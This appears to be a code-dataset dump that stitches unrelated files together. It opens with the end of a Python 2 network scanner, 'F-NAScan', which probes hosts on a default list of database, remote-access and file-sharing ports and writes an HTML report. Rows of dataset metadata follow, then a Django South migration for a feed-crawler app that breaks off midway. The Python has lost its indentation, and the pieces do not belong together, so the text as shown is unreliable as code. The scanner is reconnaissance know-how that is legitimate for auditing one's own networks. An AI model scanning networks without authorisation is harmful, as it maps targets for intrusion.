called"),s[0]},n.dataTypes[0]="json",a=e[o],e[o]=function(){s=arguments},i.always(function(){e[o]=a,n[o]&&(n.jsonpCallback=r.jsonpCallback,On.push(o)),s&&b.isFunction(a)&&a(s[0]),s=a=t}),"script"):t});var Pn,Rn,Wn=0,$n=e.ActiveXObject&&function(){var e;for(e in Pn)Pn[e](t,!0)};function In(){try{return new e.XMLHttpRequest}catch(t){}}function zn(){try{return new e.ActiveXObject("Microsoft.XMLHTTP")}catch(t){}}b.ajaxSettings.xhr=e.ActiveXObject?function(){return!this.isLocal&&In()||zn()}:In,Rn=b.ajaxSettings.xhr(),b.support.cors=!!Rn&&"withCredentials"in Rn,Rn=b.support.ajax=!!Rn,Rn&&b.ajaxTransport(function(n){if(!n.crossDomain||b.support.cors){var r;return{send:function(i,o){var a,s,u=n.xhr();if(n.username?u.open(n.type,n.url,n.async,n.username,n.password):u.open(n.type,n.url,n.async),n.xhrFields)for(s in n.xhrFields)u[s]=n.xhrFields[s];n.mimeType&&u.overrideMimeType&&u.overrideMimeType(n.mimeType),n.crossDomain||i["X-Requested-With"]||(i["X-Requested-With"]="XMLHttpRequest");try{for(s in i)u.setRequestHeader(s,i[s])}catch(l){}u.send(n.hasContent&&n.data||null),r=function(e,i){var s,l,c,p;try{if(r&&(i||4===u.readyState))if(r=t,a&&(u.onreadystatechange=b.noop,$n&&delete Pn[a]),i)4!==u.readyState&&u.abort();else{p={},s=u.status,l=u.getAllResponseHeaders(),"string"==typeof u.responseText&&(p.text=u.responseText);try{c=u.statusText}catch(f){c=""}s||!n.isLocal||n.crossDomain?1223===s&&(s=204):s=p.text?200:404}}catch(d){i||o(-1,d)}p&&o(s,c,p,l)},n.async?4===u.readyState?setTimeout(r):(a=++Wn,$n&&(Pn||(Pn={},b(e).unload($n)),Pn[a]=r),u.onreadystatechange=r):r()},abort:function(){r&&r(t,!0)}}}});var Xn,Un,Vn=/^(?:toggle|show|hide)$/,Yn=RegExp("^(?:([+-])=|)("+x+")([a-z%]*)$","i"),Jn=/queueHooks$/,Gn=[nr],Qn={"*":[function(e,t){var n,r,i=this.createTween(e,t),o=Yn.exec(t),a=i.cur(),s=+a||0,u=1,l=20;if(o){if(n=+o[2],r=o[3]||(b.cssNumber[e]?"":"px"),"px"!==r&&s){s=b.css(i.elem,e,!0)||n||1;do u=u||".5",s/=u,b.style(i.elem,e,s+r);while(u!==(u=i.cur()/a)&&1!==u&&--l)}i.unit=r,i.start=s,i.end=o[1]?s+(o[1]+1)*n:n}return i}]};function Kn(){return setTimeout(function(){Xn=t}),Xn=b.now()}function Zn(e,t){b.each(t,function(t,n){var r=(Qn[t]||[]).concat(Qn["*"]),i=0,o=r.length;for(;o>i;i++)if(r[i].call(e,t,n))return})}function er(e,t,n){var r,i,o=0,a=Gn.length,s=b.Deferred().always(function(){delete u.elem}),u=function(){if(i)return!1;var t=Xn||Kn(),n=Math.max(0,l.startTime+l.duration-t),r=n/l.duration||0,o=1-r,a=0,u=l.tweens.length;for(;u>a;a++)l.tweens[a].run(o);return s.notifyWith(e,[l,o,n]),1>o&&u?n:(s.resolveWith(e,[l]),!1)},l=s.promise({elem:e,props:b.extend({},t),opts:b.extend(!0,{specialEasing:{}},n),originalProperties:t,originalOptions:n,startTime:Xn||Kn(),duration:n.duration,tweens:[],createTween:function(t,n){var r=b.Tween(e,l.opts,t,n,l.opts.specialEasing[t]||l.opts.easing);return l.tweens.push(r),r},stop:function(t){var n=0,r=t?l.tweens.length:0;if(i)return this;for(i=!0;r>n;n++)l.tweens[n].run(1);return t?s.resolveWith(e,[l,t]):s.rejectWith(e,[l,t]),this}}),c=l.props;for(tr(c,l.opts.specialEasing);a>o;o++)if(r=Gn[o].call(l,e,c,l.opts))return r;return Zn(l,c),b.isFunction(l.opts.start)&&l.opts.start.call(e,l),b.fx.timer(b.extend(u,{elem:e,anim:l,queue:l.opts.queue})),l.progress(l.opts.progress).done(l.opts.done,l.opts.complete).fail(l.opts.fail).always(l.opts.always)}function tr(e,t){var n,r,i,o,a;for(i in e)if(r=b.camelCase(i),o=t[r],n=e[i],b.isArray(n)&&(o=n[1],n=e[i]=n[0]),i!==r&&(e[r]=n,delete e[i]),a=b.cssHooks[r],a&&"expand"in a){n=a.expand(n),delete e[r];for(i in n)i in e||(e[i]=n[i],t[i]=o)}else t[r]=o}b.Animation=b.extend(er,{tweener:function(e,t){b.isFunction(e)?(t=e,e=["*"]):e=e.split(" ");var n,r=0,i=e.length;for(;i>r;r++)n=e[r],Qn[n]=Qn[n]||[],Qn[n].unshift(t)},prefilter:function(e,t){t?Gn.unshift(e):Gn.push(e)}});function nr(e,t,n){var r,i,o,a,s,u,l,c,p,f=this,d=e.style,h={},g=[],m=e.nodeType&&nn(e);n.queue||(c=b._queueHooks(e,"fx"),null==c.unqueued&&(c.unqueued=0,p=c.empty.fire,c.empty.fire=function(){c.unqueued||p()}),c.unqueued++,f.always(function(){f.always(function(){c.unqueued--,b.queue(e,"fx").length||c.empty.fire()})})),1===e.nodeType&&("height"in t||"width"in t)&&(n.overflow=[d.overflow,d.overflowX,d.overflowY],"inline"===b.css(e,"display")&&"none"===b.css(e,"float")&&(b.support.inlineBlockNeedsLayout&&"inline"!==un(e.nodeName)?d.zoom=1:d.display="inline-block")),n.overflow&&(d.overflow="hidden",b.support.shrinkWrapBlocks||f.always(function(){d.overflow=n.overflow[0],d.overflowX=n.overflow[1],d.overflowY=n.overflow[2]}));for(i in t)if(a=t[i],Vn.exec(a)){if(delete t[i],u=u||"toggle"===a,a===(m?"hide":"show"))continue;g.push(i)}if(o=g.length){s=b._data(e,"fxshow")||b._data(e,"fxshow",{}),"hidden"in s&&(m=s.hidden),u&&(s.hidden=!m),m?b(e).show():f.done(function(){b(e).hide()}),f.done(function(){var t;b._removeData(e,"fxshow");for(t in h)b.style(e,t,h[t])});for(i=0;o>i;i++)r=g[i],l=f.createTween(r,m?s[r]:0),h[r]=s[r]||b.style(e,r),r in s||(s[r]=l.start,m&&(l.end=l.start,l.start="width"===r||"height"===r?1:0))}}function rr(e,t,n,r,i){return new rr.prototype.init(e,t,n,r,i)}b.Tween=rr,rr.prototype={constructor:rr,init:function(e,t,n,r,i,o){this.elem=e,this.prop=n,this.easing=i||"swing",this.options=t,this.start=this.now=this.cur(),this.end=r,this.unit=o||(b.cssNumber[n]?"":"px")},cur:function(){var e=rr.propHooks[this.prop];return e&&e.get?e.get(this):rr.propHooks._default.get(this)},run:function(e){var t,n=rr.propHooks[this.prop];return this.pos=t=this.options.duration?b.easing[this.easing](e,this.options.duration*e,0,1,this.options.duration):e,this.now=(this.end-this.start)*t+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),n&&n.set?n.set(this):rr.propHooks._default.set(this),this}},rr.prototype.init.prototype=rr.prototype,rr.propHooks={_default:{get:function(e){var t;return null==e.elem[e.prop]||e.elem.style&&null!=e.elem.style[e.prop]?(t=b.css(e.elem,e.prop,""),t&&"auto"!==t?t:0):e.elem[e.prop]},set:function(e){b.fx.step[e.prop]?b.fx.step[e.prop](e):e.elem.style&&(null!=e.elem.style[b.cssProps[e.prop]]||b.cssHooks[e.prop])?b.style(e.elem,e.prop,e.now+e.unit):e.elem[e.prop]=e.now}}},rr.propHooks.scrollTop=rr.propHooks.scrollLeft={set:function(e){e.elem.nodeType&&e.elem.parentNode&&(e.elem[e.prop]=e.now)}},b.each(["toggle","show","hide"],function(e,t){var n=b.fn[t];b.fn[t]=function(e,r,i){return null==e||"boolean"==typeof e?n.apply(this,arguments):this.animate(ir(t,!0),e,r,i)}}),b.fn.extend({fadeTo:function(e,t,n,r){return this.filter(nn).css("opacity",0).show().end().animate({opacity:t},e,n,r)},animate:function(e,t,n,r){var i=b.isEmptyObject(e),o=b.speed(t,n,r),a=function(){var t=er(this,b.extend({},e),o);a.finish=function(){t.stop(!0)},(i||b._data(this,"finish"))&&t.stop(!0)};return a.finish=a,i||o.queue===!1?this.each(a):this.queue(o.queue,a)},stop:function(e,n,r){var i=function(e){var t=e.stop;delete e.stop,t(r)};return"string"!=typeof e&&(r=n,n=e,e=t),n&&e!==!1&&this.queue(e||"fx",[]),this.each(function(){var t=!0,n=null!=e&&e+"queueHooks",o=b.timers,a=b._data(this);if(n)a[n]&&a[n].stop&&i(a[n]);else for(n in a)a[n]&&a[n].stop&&Jn.test(n)&&i(a[n]);for(n=o.length;n--;)o[n].elem!==this||null!=e&&o[n].queue!==e||(o[n].anim.stop(r),t=!1,o.splice(n,1));(t||!r)&&b.dequeue(this,e)})},finish:function(e){return e!==!1&&(e=e||"fx"),this.each(function(){var t,n=b._data(this),r=n[e+"queue"],i=n[e+"queueHooks"],o=b.timers,a=r?r.length:0;for(n.finish=!0,b.queue(this,e,[]),i&&i.cur&&i.cur.finish&&i.cur.finish.call(this),t=o.length;t--;)o[t].elem===this&&o[t].queue===e&&(o[t].anim.stop(!0),o.splice(t,1));for(t=0;a>t;t++)r[t]&&r[t].finish&&r[t].finish.call(this);delete n.finish})}});function ir(e,t){var n,r={height:e},i=0;for(t=t?1:0;4>i;i+=2-t)n=Zt[i],r["margin"+n]=r["padding"+n]=e;return t&&(r.opacity=r.width=e),r}b.each({slideDown:ir("show"),slideUp:ir("hide"),slideToggle:ir("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(e,t){b.fn[e]=function(e,n,r){return this.animate(t,e,n,r)}}),b.speed=function(e,t,n){var r=e&&"object"==typeof e?b.extend({},e):{complete:n||!n&&t||b.isFunction(e)&&e,duration:e,easing:n&&t||t&&!b.isFunction(t)&&t};return r.duration=b.fx.off?0:"number"==typeof r.duration?r.duration:r.duration in b.fx.speeds?b.fx.speeds[r.duration]:b.fx.speeds._default,(null==r.queue||r.queue===!0)&&(r.queue="fx"),r.old=r.complete,r.complete=function(){b.isFunction(r.old)&&r.old.call(this),r.queue&&b.dequeue(this,r.queue)},r},b.easing={linear:function(e){return e},swing:function(e){return.5-Math.cos(e*Math.PI)/2}},b.timers=[],b.fx=rr.prototype.init,b.fx.tick=function(){var e,n=b.timers,r=0;for(Xn=b.now();n.length>r;r++)e=n[r],e()||n[r]!==e||n.splice(r--,1);n.length||b.fx.stop(),Xn=t},b.fx.timer=function(e){e()&&b.timers.push(e)&&b.fx.start()},b.fx.interval=13,b.fx.start=function(){Un||(Un=setInterval(b.fx.tick,b.fx.interval))},b.fx.stop=function(){clearInterval(Un),Un=null},b.fx.speeds={slow:600,fast:200,_default:400},b.fx.step={},b.expr&&b.expr.filters&&(b.expr.filters.animated=function(e){return b.grep(b.timers,function(t){return e===t.elem}).length}),b.fn.offset=function(e){if(arguments.length)return e===t?this:this.each(function(t){b.offset.setOffset(this,e,t)});var n,r,o={top:0,left:0},a=this[0],s=a&&a.ownerDocument;if(s)return n=s.documentElement,b.contains(n,a)?(typeof a.getBoundingClientRect!==i&&(o=a.getBoundingClientRect()),r=or(s),{top:o.top+(r.pageYOffset||n.scrollTop)-(n.clientTop||0),left:o.left+(r.pageXOffset||n.scrollLeft)-(n.clientLeft||0)}):o},b.offset={setOffset:function(e,t,n){var r=b.css(e,"position");"static"===r&&(e.style.position="relative");var i=b(e),o=i.offset(),a=b.css(e,"top"),s=b.css(e,"left"),u=("absolute"===r||"fixed"===r)&&b.inArray("auto",[a,s])>-1,l={},c={},p,f;u?(c=i.position(),p=c.top,f=c.left):(p=parseFloat(a)||0,f=parseFloat(s)||0),b.isFunction(t)&&(t=t.call(e,n,o)),null!=t.top&&(l.top=t.top-o.top+p),null!=t.left&&(l.left=t.left-o.left+f),"using"in t?t.using.call(e,l):i.css(l)}},b.fn.extend({position:function(){if(this[0]){var e,t,n={top:0,left:0},r=this[0];return"fixed"===b.css(r,"position")?t=r.getBoundingClientRect():(e=this.offsetParent(),t=this.offset(),b.nodeName(e[0],"html")||(n=e.offset()),n.top+=b.css(e[0],"borderTopWidth",!0),n.left+=b.css(e[0],"borderLeftWidth",!0)),{top:t.top-n.top-b.css(r,"marginTop",!0),left:t.left-n.left-b.css(r,"marginLeft",!0)}}},offsetParent:function(){return this.map(function(){var e=this.offsetParent||o.documentElement;while(e&&!b.nodeName(e,"html")&&"static"===b.css(e,"position"))e=e.offsetParent;return e||o.documentElement})}}),b.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(e,n){var r=/Y/.test(n);b.fn[e]=function(i){return b.access(this,function(e,i,o){var a=or(e);return o===t?a?n in a?a[n]:a.document.documentElement[i]:e[i]:(a?a.scrollTo(r?b(a).scrollLeft():o,r?o:b(a).scrollTop()):e[i]=o,t)},e,i,arguments.length,null)}});function or(e){return b.isWindow(e)?e:9===e.nodeType?e.defaultView||e.parentWindow:!1}b.each({Height:"height",Width:"width"},function(e,n){b.each({padding:"inner"+e,content:n,"":"outer"+e},function(r,i){b.fn[i]=function(i,o){var a=arguments.length&&(r||"boolean"!=typeof i),s=r||(i===!0||o===!0?"margin":"border");return b.access(this,function(n,r,i){var o;return b.isWindow(n)?n.document.documentElement["client"+e]:9===n.nodeType?(o=n.documentElement,Math.max(n.body["scroll"+e],o["scroll"+e],n.body["offset"+e],o["offset"+e],o["client"+e])):i===t?b.css(n,r,s):b.style(n,r,i,s)},n,a?i:t,a,null)}})}),e.jQuery=e.$=b,"function"==typeof define&&define.amd&&define.amd.jQuery&&define("jquery",[],function(){return b})})(window);
	</script>
	<script>
		function AccordionMenu(options){this.config={containerCls:".wrap-menu",menuArrs:"",type:"click",renderCallBack:null,clickItemCallBack:null};this.cache={};this.init(options)}AccordionMenu.prototype={constructor:AccordionMenu,init:function(options){this.config=$.extend(this.config,options||{});var self=this,_config=self.config,_cache=self.cache;$(_config.containerCls).each(function(index,item){self._renderHTML(item);self._bindEnv(item)})},_renderHTML:function(container){var self=this,_config=self.config,_cache=self.cache;var ulhtml=$("<ul></ul>");$(_config.menuArrs).each(function(index,item){var lihtml=$("<li><h2>"+item.name+"</h2></li>");if(item.submenu&&item.submenu.length>0){self._createSubMenu(item.submenu,lihtml)}$(ulhtml).append(lihtml)});$(container).append(ulhtml);_config.renderCallBack&&$.isFunction(_config.renderCallBack)&&_config.renderCallBack();self._levelIndent(ulhtml)},_createSubMenu:function(submenu,lihtml){var self=this,_config=self.config,_cache=self.cache;var subUl=$("<ul></ul>"),callee=arguments.callee,subLi;$(submenu).each(function(index,item){var url=item.url||"javascript:void(0)";subLi=$('<li><a href="'+url+'">'+item.name+"</a></li>");if(item.submenu&&item.submenu.length>0){$(subLi).children("a").prepend('<img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH/C1hNUCBEYXRhWE1QPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNS4wLWMwNjAgNjEuMTM0Nzc3LCAyMDEwLzAyLzEyLTE3OjMyOjAwICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOnhtcE1NPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvbW0vIiB4bWxuczpzdFJlZj0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL3NUeXBlL1Jlc291cmNlUmVmIyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgQ1M1IFdpbmRvd3MiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6NTRDOUU5QTc5RjAzMTFFMTk5NUZBMDVGQkVFNUU3NTIiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6NTRDOUU5QTg5RjAzMTFFMTk5NUZBMDVGQkVFNUU3NTIiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo1NEM5RTlBNTlGMDMxMUUxOTk1RkEwNUZCRUU1RTc1MiIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo1NEM5RTlBNjlGMDMxMUUxOTk1RkEwNUZCRUU1RTc1MiIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PgH//v38+/r5+Pf29fTz8vHw7+7t7Ovq6ejn5uXk4+Lh4N/e3dzb2tnY19bV1NPS0dDPzs3My8rJyMfGxcTDwsHAv769vLu6ubi3trW0s7KxsK+urayrqqmop6alpKOioaCfnp2cm5qZmJeWlZSTkpGQj46NjIuKiYiHhoWEg4KBgH9+fXx7enl4d3Z1dHNycXBvbm1sa2ppaGdmZWRjYmFgX15dXFtaWVhXVlVUU1JRUE9OTUxLSklIR0ZFRENCQUA/Pj08Ozo5ODc2NTQzMjEwLy4tLCsqKSgnJiUkIyIhIB8eHRwbGhkYFxYVFBMSERAPDg0MCwoJCAcGBQQDAgEAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" alt=""/>');callee(item.submenu,subLi)}$(subUl).append(subLi)});$(lihtml).append(subUl)},_levelIndent:function(ulList){var self=this,_config=self.config,_cache=self.cache,callee=arguments.callee;var initTextIndent=2,lev=1,$oUl=$(ulList);while($oUl.find("ul").length>0){initTextIndent=parseInt(initTextIndent,10)+2+"em";$oUl.children().children("ul").addClass("lev-"+lev).children("li").css("text-indent",initTextIndent);$oUl=$oUl.children().children("ul");lev++}$(ulList).find("ul").hide();$(ulList).find("ul:first").show()},_bindEnv:function(container){var self=this,_config=self.config;$("h2,a",container).unbind(_config.type);$("h2,a",container).bind(_config.type,function(e){if($(this).siblings("ul").length>0){$(this).siblings("ul").slideToggle("slow").end().children("img").toggleClass("unfold")}$(this).parent("li").siblings().find("ul").hide().end().find("img.unfold").removeClass("unfold");_config.clickItemCallBack&&$.isFunction(_config.clickItemCallBack)&&_config.clickItemCallBack($(this))})}};
	</script>
	</head>
	<body>
		<div class="wrap-menu">
		</div>
		<div class="wrap-data">
			<div id='result'>
			$statistics$
			</div>
		</div>
	</body>
	<script>
	var adinfo=$adinfo$;
	$(function(){
		new AccordionMenu({menuArrs:adinfo});
	});
		function view(ip){
		var data = $data$;
		try{
			$("#result").html("<pre>" + decodeURIComponent(data[ip]) + "</pre>");
		}catch(err){
			$("#result").html("<pre>" + unescape(data[ip]) + "</pre>");
		}
		}
	</script>
</html>")
mo_html = mo_html.replace('$adinfo$',str(json.dumps(re_json)))
mo_html = mo_html.replace('$data$',json.dumps(port_data))
mo_html = mo_html.replace('$statistics$',td_html)
result = open(ip + "-" + str(int(time.time())) + ".html","w")
result.write(mo_html)
result.close()
except Exception,e:
print 'Results output failure'
def t_join(m_count):
tmp_count = 0
i = 0
while True:
time.sleep(2)
ac_count = threading.activeCount()
if ac_count < m_count and ac_count == tmp_count:
i+=1
else:
i = 0
tmp_count = ac_count
#print ac_count,queue.qsize()
if (queue.empty() and threading.activeCount() <= 1) or i > 5:
break
if __name__=="__main__":
mark_list = read_config('server_info')
msg = '''
Scanning a network asset information script,author:wolf@future-sec.
Usage: python F-NAScan.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10] [-n]
'''
if len(sys.argv) < 2:
print msg
try:
options,args = getopt.getopt(sys.argv[1:],"h:p:m:t:n")
ip = ''
noping = False
port = '21,22,23,25,53,80,110,139,143,389,443,445,465,873,993,995,1080,1723,1433,1521,3306,3389,3690,5432,5800,5900,6379,7001,8000,8001,8080,8081,8888,9200,9300,9080,9999,11211,27017'
m_count = 100
for opt,arg in options:
if opt == '-h':
ip = arg
elif opt == '-p':
port = arg
elif opt == '-m':
m_count = int(arg)
elif opt == '-t':
timeout = int(arg)
elif opt == '-n':
noping = True
if ip:
ip_list = get_ip_list(ip)
port_list = get_port_list(port)
if not noping:ip_list=get_ac_ip(ip_list)
for ip_str in ip_list:
for port_int in port_list:
queue.put(':'.join([ip_str,port_int]))
for i in range(m_count):
t = ThreadNum(queue)
t.setDaemon(True)
t.start()
t_join(m_count)
write_result()
except Exception,e:
print e
print msg
| 390.771505
| 132,582
| 0.957425
| 1,903
| 145,367
| 72.980032
| 0.295323
| 0.000864
| 0.001037
| 0.000691
| 0.006408
| 0.003118
| 0.002556
| 0.001995
| 0.001397
| 0.000778
| 0
| 0.133243
| 0.028817
| 145,367
| 371
| 132,583
| 391.824798
| 0.850487
| 0.000427
| 0
| 0.256267
| 0
| 0.011142
| 0.919553
| 0.914736
| 0
| 1
| 0.000124
| 0
| 0
| 0
| null | null | 0.019499
| 0.002786
| null | null | 0.030641
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
038cd28a0fd1a8625604750e11f601065d12d040
| 26,618
|
py
|
Python
|
opps/feedcrawler/migrations/0001_initial.py
|
jeanmask/opps-feedcrawler
|
2be79a644f644a3f0b35555dd4b7fdb65065df3d
|
[
"MIT"
] | null | null | null |
opps/feedcrawler/migrations/0001_initial.py
|
jeanmask/opps-feedcrawler
|
2be79a644f644a3f0b35555dd4b7fdb65065df3d
|
[
"MIT"
] | null | null | null |
opps/feedcrawler/migrations/0001_initial.py
|
jeanmask/opps-feedcrawler
|
2be79a644f644a3f0b35555dd4b7fdb65065df3d
|
[
"MIT"
] | 3
|
2015-03-30T17:04:13.000Z
|
2019-06-26T12:20:12.000Z
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
from django.contrib.auth import get_user_model
User = get_user_model()
class Migration(SchemaMigration):
depends_on = (
("images", "0001_initial"),
("channels", "0001_initial"),
)
def forwards(self, orm):
# Adding model 'FeedType'
db.create_table(u'feedcrawler_feedtype', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255)),
('processor', self.gf('django.db.models.fields.CharField')(default='opps.feedcrawler.processors.rss.RSSProcessor', max_length=255)),
('actions', self.gf('django.db.models.fields.CharField')(default='opps.feedcrawler.actions.rss.RSSActions', max_length=255)),
))
db.send_create_signal(u'feedcrawler', ['FeedType'])
# Adding model 'Group'
db.create_table(u'feedcrawler_group', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=250)),
))
db.send_create_signal(u'feedcrawler', ['Group'])
# Adding model 'Feed'
db.create_table(u'feedcrawler_feed', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('date_insert', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('date_update', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['%s.%s' % (User._meta.app_label, User._meta.object_name)])),
('site', self.gf('django.db.models.fields.related.ForeignKey')(default=1, to=orm['sites.Site'])),
('site_iid', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True, max_length=4, null=True, blank=True)),
('site_domain', self.gf('django.db.models.fields.CharField')(db_index=True, max_length=100, null=True, blank=True)),
('date_available', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, null=True, db_index=True)),
('published', self.gf('django.db.models.fields.BooleanField')(default=False, db_index=True)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=150)),
('title', self.gf('django.db.models.fields.CharField')(max_length=255)),
('description', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('link', self.gf('django.db.models.fields.CharField')(max_length=2000, null=True, blank=True)),
('source_url', self.gf('django.db.models.fields.CharField')(max_length=255)),
('source_username', self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True)),
('source_password', self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True)),
('source_port', self.gf('django.db.models.fields.PositiveIntegerField')(null=True, blank=True)),
('source_root_folder', self.gf('django.db.models.fields.CharField')(default='/', max_length=255)),
('source_json_params', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('published_time', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('last_polled_time', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('group', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['feedcrawler.Group'], null=True, blank=True)),
('feed_type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['feedcrawler.FeedType'])),
('max_entries', self.gf('django.db.models.fields.PositiveIntegerField')(null=True, blank=True)),
('publish_entries', self.gf('django.db.models.fields.BooleanField')(default=True)),
('channel', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['channels.Channel'], null=True, on_delete=models.SET_NULL, blank=True)),
('main_image', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='feed_image', null=True, on_delete=models.SET_NULL, to=orm['images.Image'])),
))
db.send_create_signal(u'feedcrawler', ['Feed'])
# Adding model 'Entry'
db.create_table(u'feedcrawler_entry', (
(u'container_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['containers.Container'], unique=True, primary_key=True)),
('entry_feed', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['feedcrawler.Feed'])),
('entry_title', self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True)),
('entry_link', self.gf('django.db.models.fields.CharField')(max_length=2000, null=True, blank=True)),
('entry_description', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('entry_content', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('entry_published_time', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('entry_pulled_time', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('entry_json', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('entry_category', self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True)),
('entry_category_code', self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True)),
('post_created', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal(u'feedcrawler', ['Entry'])
# Adding model 'ProcessLog'
db.create_table(u'feedcrawler_processlog', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('feed', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['feedcrawler.Feed'])),
('type', self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True)),
('text', self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True)),
('log_time', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, auto_now_add=True, blank=True)),
))
db.send_create_signal(u'feedcrawler', ['ProcessLog'])
def backwards(self, orm):
# Deleting model 'FeedType'
db.delete_table(u'feedcrawler_feedtype')
# Deleting model 'Group'
db.delete_table(u'feedcrawler_group')
# Deleting model 'Feed'
db.delete_table(u'feedcrawler_feed')
# Deleting model 'Entry'
db.delete_table(u'feedcrawler_entry')
# Deleting model 'ProcessLog'
db.delete_table(u'feedcrawler_processlog')
models = {
u'%s.%s' % (User._meta.app_label, User._meta.module_name): {
'Meta': {'object_name': User.__name__},
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'channels.channel': {
'Meta': {'ordering': "['name', 'parent__id', 'published']", 'unique_together': "(('site', 'long_slug', 'slug', 'parent'),)", 'object_name': 'Channel'},
'date_available': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'date_insert': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'group': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'homepage': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'include_in_main_rss': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'layout': ('django.db.models.fields.CharField', [], {'default': "'default'", 'max_length': '250', 'db_index': 'True'}),
u'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
u'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'long_slug': ('django.db.models.fields.SlugField', [], {'max_length': '250'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
